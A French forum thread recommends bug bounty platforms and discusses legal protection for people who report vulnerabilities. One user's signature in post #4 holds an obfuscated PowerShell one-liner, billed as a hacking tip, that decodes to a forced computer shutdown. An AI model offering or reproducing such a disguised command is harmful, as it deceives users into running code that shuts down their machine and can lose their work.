Annonce

Réduire
Aucune annonce.

Signaler des Failles pour gagner de l'argent ou de la reconnaissance

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Signaler des Failles pour gagner de l'argent ou de la reconnaissance

    Ce site est vraiment intéressant, il propose une liste de programmes auquel il faut déceler des vulnérabilités.

    Chaque rapport est envoyé au service sécurité du programme concerné et en contre partie vous allez recevoir soit de l'argent soit de la reconnaissance.


    exemple de programmes:







    https://hackerone.com/

    facebook n'est pas dans le liste, mais cette article peut donner des idées a certain

    http://threatpost.com/facebook-pays-...on-flaw/103794
    Dernière modification par pl3x, 03 juin 2014, 10h54.

  • #2
    Je trouve que c'est vraiment une bonne idée !Merci du lien ^^

    Commentaire


    • #3
      Merci pour lien.
      Je trouve qu'à l'heure actuel ( 2017 ). Les lanceurs d'alertes ne sont pas assez protegés au niveau des lois.
      Si par exemple Mr X trouve une faille sur un site Y . Aucune garantie pour monsieur X que ça demarche se passera sans encombre.

      Pour ma part, je trouve qu'une societé devrait remercier le lanceur d'alerte. Et malheureusement beaucoup trop d'entreprise utilise le systeme contraire, et déposant plainte contre Mr X.

      J'espere sincèrement que de ce coté là les mentalités evolueront ...
      Dernière modification par jupi, 29 avril 2017, 07h54.

      Commentaire


      • #4
        C'est en partie pour ça que sont nés les programmes de bug bouty, qui donnent un cadre légal aux chercheurs.

        Signalons aussi la plateforme française (bien que moins fournie que Hackerone en programmes publiques) : https://bountyfactory.io/programs
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Salut,

          Légalement le seul cadre légal c'est de faire remonter ce que tu as trouvé via le dispositif de l'ANSSI. Le reste est toléré mais le jour où il y a un problème, ça fera jurisprudence.
          Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

          Commentaire


          • #6
            Salut et merci c'est tres interessant de savoir qu'on en parle sur ce forum....pour l'info moi je les vu en fouinant sur le web et envie de marcher dans la légalité je me inscris donc je vous y invite. On aussi le BUG BOUNTY FAcTORY france c'est a aller check aussi.

            Commentaire

            Chargement...
            X